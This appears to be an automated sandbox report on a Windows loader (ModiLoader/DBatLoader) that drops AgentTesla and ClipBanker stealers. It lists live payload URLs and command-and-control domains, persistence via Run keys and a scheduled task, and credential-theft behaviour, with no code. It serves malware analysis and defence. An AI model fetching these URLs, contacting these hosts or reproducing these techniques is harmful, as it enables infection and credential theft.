                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder
                      311
                      Masquerading
                      Cached Domain Credentials431
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem151
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562866 Sample: 2jbMIxCFsK.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 93 s82.gocheapweb.com 2->93 95 pywolwnvd.biz 2->95 97 2 other IPs or domains 2->97 131 Found malware configuration 2->131 133 Malicious sample detected (through community Yara rule) 2->133 135 Antivirus detection for dropped file 2->135 137 13 other signatures 2->137 10 2jbMIxCFsK.exe 1 7 2->10         started        15 Wisrysxl.PIF 2->15         started        17 Wisrysxl.PIF 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 103 gxe0.com 198.252.105.91, 443, 49704, 49705 HAWKHOSTCA Canada 10->103 87 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 10->87 dropped 89 C:\Users\Public\Wisrysxl.url, MS 10->89 dropped 91 C:\Users\Public\Libraries\Wisrysxl, data 10->91 dropped 151 Drops PE files with a suspicious file extension 10->151 153 Writes to foreign memory regions 10->153 155 Allocates memory in foreign processes 10->155 157 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->157 21 lxsyrsiW.pif 4 10->21         started        25 cmd.exe 1 10->25         started        27 esentutl.exe 2 10->27         started        159 Antivirus detection for dropped file 15->159 161 Multi AV Scanner detection for dropped file 15->161 163 Machine Learning detection for dropped file 15->163 29 lxsyrsiW.pif 15->29         started        165 Sample uses process hollowing technique 17->165 167 Allocates many large memory junks 17->167 31 lxsyrsiW.pif 17->31         started        file6 signatures7 process8 file9 79 C:\Users\user\AppData\...\server_BTC.exe, PE32 21->79 dropped 81 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 21->81 dropped 83 C:\Program Files (x86)\...\armsvc.exe, PE32 21->83 dropped 139 Drops executable to a common third party application directory 21->139 141 Infects executable files (exe, dll, sys, html) 21->141 33 server_BTC.exe 7 21->33         started        37 neworigin.exe 15 2 21->37         started        40 esentutl.exe 2 25->40         started        52 2 other processes 25->52 85 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 27->85 dropped 42 conhost.exe 27->42         started        44 neworigin.exe 29->44         started        46 server_BTC.exe 29->46         started        48 neworigin.exe 31->48         started        50 server_BTC.exe 31->50         started        signatures10 process11 dnsIp12 73 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 33->73 dropped 105 Antivirus detection for dropped file 33->105 107 Multi AV Scanner detection for dropped file 33->107 109 Machine Learning detection for dropped file 33->109 127 2 other signatures 33->127 54 TrojanAIbot.exe 33->54         started        57 powershell.exe 33->57         started        59 cmd.exe 33->59         started        61 schtasks.exe 33->61         started        99 s82.gocheapweb.com 51.195.88.199, 49707, 49724, 49742 OVHFR France 37->99 101 api.ipify.org 104.26.13.205, 443, 49706, 49736 CLOUDFLARENETUS United States 37->101 111 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->111 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->113 115 Tries to steal Mail credentials (via file / registry access) 37->115 117 Contains functionality to register a low level keyboard hook 37->117 75 C:\Users\Public\alpha.pif, PE32 40->75 dropped 119 Drops PE files to the user root directory 40->119 121 Drops PE files with a suspicious file extension 40->121 123 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->123 125 Tries to harvest and steal ftp login credentials 48->125 129 2 other signatures 48->129 77 C:\Users\Public\xpha.pif, PE32 52->77 dropped file13 signatures14 process15 signatures16 143 Antivirus detection for dropped file 54->143 145 Multi AV Scanner detection for dropped file 54->145 147 Machine Learning detection for dropped file 54->147 149 Loading BitLocker PowerShell Module 57->149 63 conhost.exe 57->63         started        65 WmiPrvSE.exe 57->65         started        67 conhost.exe 59->67         started        69 timeout.exe 59->69         started        71 conhost.exe 61->71         started        process17

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      2jbMIxCFsK.exe58%ReversingLabsWin32.Trojan.ModiLoader
                      2jbMIxCFsK.exe100%AviraHEUR/AGEN.1325995
                      2jbMIxCFsK.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%AviraHEUR/AGEN.1325995
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF58%ReversingLabsWin32.Trojan.ModiLoader
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\Public\xpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe92%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe92%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://gxe0.com/yak/233_Wisrysxlfsse0%Avira URL Cloudsafe
                      https://gxe0.com:443/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfssl0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      198.252.105.91
                      truefalse
                        high
                        pywolwnvd.biz
                        54.244.188.177
                        truefalse
                          high
                          api.ipify.org
                          104.26.13.205
                          truefalse
                            high
                            s82.gocheapweb.com
                            51.195.88.199
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl02jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://gxe0.com/yak/233_Wisrysx2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://sectigo.com/CPS02jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl02jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com02jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://r11.o.lencr.org0#neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.microsoft.powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.ipify.org/tneworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://gxe0.com/2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://r11.i.lencr.org/0neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.ipify.orgneworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://gxe0.com/yak/233_Wisrysxlfsse2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://x1.c.lencr.org/0neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://s82.gocheapweb.comneworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://gxe0.com/yak/233_Wisrysxlfssl2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://gxe0.com:443/yak/233_Wisrysxlfss2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.pmail.com2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        high
                                                                                        http://ocsp.sectigo.com0C2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          198.252.105.91
                                                                                          gxe0.comCanada
                                                                                          20068HAWKHOSTCAfalse
                                                                                          104.26.13.205
                                                                                          api.ipify.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          51.195.88.199
                                                                                          s82.gocheapweb.comFrance
                                                                                          16276OVHFRfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1562866
                                                                                          Start date and time:2024-11-26 08:12:06 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 13m 22s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:32
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:2jbMIxCFsK.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.spyw.evad.winEXE@49/26@4/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 80%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 97%
                                                                                          • Number of executed functions: 268
                                                                                          • Number of non-executed functions: 50
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target TrojanAIbot.exe, PID 6208 because it is empty
                                                                                          • Execution Graph export aborted for target server_BTC.exe, PID 3748 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: 2jbMIxCFsK.exe
                                                                                          TimeTypeDescription
                                                                                          02:12:58API Interceptor2x Sleep call for process: 2jbMIxCFsK.exe modified
                                                                                          02:13:14API Interceptor26x Sleep call for process: powershell.exe modified
                                                                                          02:13:14API Interceptor5785634x Sleep call for process: neworigin.exe modified
                                                                                          02:13:15API Interceptor2029889x Sleep call for process: TrojanAIbot.exe modified
                                                                                          02:13:22API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
                                                                                          08:13:13Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                          08:13:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                          08:13:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                          08:13:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                                          104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                          • api.ipify.org/
                                                                                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • api.ipify.org/
                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • api.ipify.org/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          api.ipify.orgPacking List - SAPPHIRE X.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 172.67.74.152
                                                                                          WOOYANG VENUS PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 172.67.74.152
                                                                                          https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                          • 104.26.13.205
                                                                                          Orden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 172.67.74.152
                                                                                          RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 104.26.12.205
                                                                                          DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                          • 104.26.13.205
                                                                                          Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                          • 104.26.13.205
                                                                                          PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 104.26.13.205
                                                                                          CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 104.26.12.205
                                                                                          New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          gxe0.comRFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
